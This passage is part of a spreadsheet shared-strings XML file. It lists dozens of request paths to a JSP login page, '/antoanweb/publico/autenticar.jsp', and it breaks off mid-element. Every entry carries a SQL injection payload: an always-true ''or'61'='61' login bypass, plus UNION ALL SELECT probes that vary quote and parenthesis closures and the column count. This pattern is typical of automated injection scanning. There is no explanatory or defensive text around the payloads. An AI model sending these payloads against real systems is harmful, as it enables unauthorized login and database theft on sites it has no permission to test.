  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247,9247#and(((3976=3976</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar)))unionallselect7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924,7924#and(((620=620</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806,806#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906,8906#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461,2461#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325,6325#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867,3867#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001,6001#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121,6121#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197,1197#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118,9118#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrarunionallselect8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931,8931#</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606,3606#and('vtqm'='vtqm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524,8524#and('eqaf'='eqaf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228,228#and('lubf'='lubf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368,7368#and('pmef'='pmef</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576,6576#and('lhrq'='lhrq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390,1390#and('blxw'='blxw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919,3919#and('qlzf'='qlzf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215,3215#and('zctv'='zctv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322,6322#and('kbze'='kbze</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392,6392#and('mwmr'='mwmr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985,9985#and(('uczy'='uczy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576,9576#and(('deas'='deas</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502,9502#and(('kwty'='kwty</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686,6686#and(('jdny'='jdny</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311,5311#and(('sdxf'='sdxf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382,9382#and(('ntxr'='ntxr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020,1020#and(('ypmj'='ypmj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748,6748#and(('zqfm'='zqfm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926,5926#and(('lhib'='lhib</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929,8929#and(('xzjm'='xzjm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129,1129#and((('gixo'='gixo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399,1399#and((('rdoy'='rdoy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268,7268#and((('jyof'='jyof</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133,2133#and((('jxve'='jxve</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453,5453#and((('azos'='azos</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411,9411#and((('cyvo'='cyvo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082,7082#and((('zuim'='zuim</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472,8472#and((('znqb'='znqb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311,4311#and((('yxic'='yxic</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872,9872#and((('zxmx'='zxmx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834,9834#and'vwsg'='vwsg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814,6814#and'jbpx'='jbpx</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037,3037#and'fbyc'='fbyc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992,9992#and'wdzk'='wdzk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998,1998#and'ichs'='ichs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575,6575#and'icgn'='icgn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945,1945#and'uznv'='uznv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971,4971#and'mebg'='mebg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810,3810#and'btcy'='btcy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'unionallselect8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235,8235#and'ihuk'='ihuk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782,7782#and('sglj'like'sglj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874,1874#and('twwj'like'twwj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549,6549#and('upiz'like'upiz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417,1417#and('qgim'like'qgim</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850,5850#and('mcra'like'mcra</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488,7488#and('afnm'like'afnm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561,1561#and('vikc'like'vikc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433,9433#and('ulrr'like'ulrr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038,1038#and('soiu'like'soiu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')unionallselect3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468,3468#and('jdzu'like'jdzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041,2041#and(('onnq'like'onnq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957,8957#and(('xphl'like'xphl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825,825#and(('yqic'like'yqic</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787,9787#and(('lkxo'like'lkxo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889,3889#and(('wfqo'like'wfqo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459,3459#and(('ogud'like'ogud</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569,8569#and(('rtwh'like'rtwh</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327,6327#and(('ssdj'like'ssdj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952,5952#and(('vykl'like'vykl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar'))unionallselect1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287,1287#and(('xscp'like'xscp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593,6593#and((('tgvj'like'tgvj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8,8#and((('mphr'like'mphr</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423,3423#and((('jljb'like'jljb</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar')))unionallselect675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675,675#and((('jspt'like'jspt</t>
  </si>
  <si>
